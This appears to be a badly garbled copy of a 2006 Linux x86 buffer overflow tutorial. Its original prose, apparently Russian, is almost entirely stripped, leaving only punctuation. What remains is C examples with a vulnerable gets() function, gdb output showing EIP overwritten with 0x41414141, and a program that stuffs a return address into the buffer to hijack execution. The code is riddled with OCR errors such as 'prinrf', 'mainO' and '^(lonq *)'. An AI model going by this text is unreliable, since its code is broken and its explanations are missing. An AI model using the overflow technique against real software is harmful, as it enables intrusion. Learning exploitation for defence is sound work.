. 2006.
(Linux x32)
; . , . (), , .
. , , . . , , . . .
. :,text,,bss .data. .text , .data ,bss . bss .data . .data , .bss . ,.text, .
ee (stack) (heap). , LIFO (Last In, First Out - , ); , , LIFO , , , .
, ; .
, , . FIFO (First In, First Out , ). , , , , . 1.
. 1.
. , . , , , Smashing the Stack for Fun and Profit ( ) (Aleph One1). , 1996 ., , , .
|
|
; , , Smashing the Stack. , 25 . , - .
. . .
, ++ - . , , , , , .
, , , . , . , .
int main() {
int array[5] = {1, 2. 3. 4, 5};
prinrf("%d\n", array[5]);
}
-. array, . , : (array[0]) 4 (array[4]). , , . , .
[root@1ocalhost /]# gcc buffer
[root@1ocalhost /]#./a out
-1073743044
[root@localhost /]#
, ; . ? , . , .
int main() {
int [5].
int i;
for (i = 0; i <= 255. ++i) {
array[i] = 10;
}
}
, , . .
[root@localhost /]# gcc buffer2.c
[root@localhost /]# /a out
Segmentation fault (core dumped)
[root@loca 1 host /]#
, , , . , .
|
|
, ? , (, TCP/IP)?
, , . , , . , , , , .
, . , .
, , , stdout:
void return_input (void){
char array[30];
gets(array);
pnntf("%s\n", array);
}
mainO {
return_input();
return 0;
}
array , . ( , ). , . :
[root@localhost /]# /overflow
; , . 40 . .
[root@localhost /]# /overflow
Segmentation fault (core dumped)
[root@localhost /]#
, , ? ? 2. , array.
. 2.
32- . EP . (RET) . ( 0x41414141, ) . , , . ; :
[root@l1 host /]# gdb overflow core
(gdb) info registers
eax 0x29
ecx 0x1000
edx 0x0
ebx 0x401509e4
esp 0xbffffab8
ebp 0x41414141
esi 0x40016b64
edi 0xbffffb2c
eip 0x41414141
, . EIP 0x41414141! , , .
EIP
, , , EIP . , DOS-, , - . . , , EIP.
, , , . EIP , . .
|
|
. retum_input , main. , gdb , return_input:
[root@"localhost /]# gdb overflow
(gdb) chsas main
Dump of assembler code for function main-
0x80484b8 <main>
0x80484b9 <main+l>
0x80484bb <main+3>-
0x80484c0 <main+8>-
0x80484c5 <main+13>
0x80484c6 <main+22>
End of assembler dump.
, 0x80484bb. 0x80484bb ASCII-, . overflow. , 8 ( 8 ). returnjnput gdb; , array. :
0x8048493 <return_input+3> sub $0x20.%esp
0x20 32, 8 40. :
main(){
int i=0.
char stuffing[44].
for (i=0.i<=40,i+=4)
^(lonq *) &stuffing[i] = 0x80484bb,
puts(stuffing)
}
, address_to_char overflow. , , . 0x80484bb, EIP. :
[root@loca!host /]# (./address_to_char.cat) |./overflow
input
""""""""""""""<u__.input
input
input
.